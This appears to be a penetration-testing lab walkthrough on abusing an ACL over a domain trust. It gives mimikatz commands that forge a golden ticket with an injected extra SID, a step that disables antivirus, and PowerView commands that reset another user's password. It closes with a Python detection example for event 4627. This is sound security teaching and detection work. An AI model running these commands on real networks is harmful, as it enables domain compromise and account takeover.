Exploit ACL with external trust golden ticket

  • Ok, now imagine we want to exploit this ACL from Maryland:

So far I haven't found a nice way to do this from Linux, but from Windows it is pretty easy.

  • Connect as administrator on baltimore and disable the antivirus to be able to use mimikatz and PowerView

  • Create the golden ticket with mimikatz, adding the SID of the group CentralPark (RID 1130) as an extra SID:

mimikatz # kerberos::golden /user:guard /domain:maryland.local /sid:S-1-5-21-2203133648-1386395927-1390703624 /krbtgt:e58cf01ba6cc645da9f7ab1f28fc3934 /sids:S-1-5-21-1409754491-4246775990-3914137275-1130 /ptt

  • And now use PowerView to change diego.Montenegro's password:

Import-Module .\powerview.ps1
$SecPassword = ConvertTo-SecureString 'letsdothis' -AsPlainText -Force
Set-DomainUserPassword -Identity diego.Montenegro -AccountPassword $SecPassword -Domain newyork.local

  • And it works!

  • And if we look at the tickets that were created, using klist:

    • Server: krbtgt/maryland.local @ maryland.local (golden ticket)

    • Server: krbtgt/NEWYORK.LOCAL @ MARYLAND.LOCAL (kdc: baltimore) (tgt inter realm)

    • Server: ldap/nyc.newyork.local @ NEWYORK.LOCAL (kdc: NYC)

    • Server: ldap/nyc.newyork.local/newyork.local @ NEWYORK.LOCAL (kdc: nyc)
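From the NEWYORK side, the thing to look for is a logon by a MARYLAND account whose token carries NEWYORK SIDs, which is exactly what SID filtering (quarantine) on the trust would strip. The following detection example is added here and is not part of the original notes: it parses constructed records in the shape of Windows event 4627 (Group Membership Information) and flags that pattern. Only the domain SIDs and RID 1130 come from the page; the account `clerk`, the other RIDs and the sample text are assumptions.

```python
import re

# NEWYORK's domain SID from the page; the ACL being abused lives there.
NEWYORK_SID = "S-1-5-21-1409754491-4246775990-3914137275"

# Constructed sample shaped like event 4627 (Group Membership Information) from
# a NEWYORK host. Only RID 1130 (CentralPark) is from the page; the rest is made up.
SAMPLE_4627 = """\
Account Name: guard
Account Domain: MARYLAND
Group Membership:
\tS-1-5-21-2203133648-1386395927-1390703624-513
\tS-1-5-21-1409754491-4246775990-3914137275-1130
\tS-1-1-0
---
Account Name: clerk
Account Domain: MARYLAND
Group Membership:
\tS-1-5-21-2203133648-1386395927-1390703624-513
\tS-1-5-11
---
Account Name: diego.Montenegro
Account Domain: NEWYORK
Group Membership:
\tS-1-5-21-1409754491-4246775990-3914137275-513
"""

def parse_4627(text):
    """Split the text into one record per event: account, domain and group SIDs."""
    records = []
    for chunk in text.split("---"):
        fields = dict(re.findall(r"^(Account Name|Account Domain): (.+)$", chunk, re.M))
        if not fields:
            continue
        sids = re.findall(r"^\t(S-1-\S+)$", chunk, re.M)
        records.append({"account": fields["Account Name"],
                        "domain": fields["Account Domain"], "sids": sids})
    return records

def find_sid_injection(records, local_domain, local_sid):
    """Flag logons by an account from another domain whose token holds SIDs of the
    local domain. A filtered trust strips those SIDs at the KDC, so seeing them
    means the trust is unfiltered and the SID arrived via the ticket's ExtraSids."""
    findings = []
    for r in records:
        injected = [s for s in r["sids"] if s.startswith(local_sid + "-")]
        if r["domain"].upper() != local_domain.upper() and injected:
            findings.append({"account": r["account"], "domain": r["domain"], "injected": injected})
    return findings
```

Event 4627 is only written when the "Audit Group Membership" subcategory is enabled, so turn that on before relying on this check.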
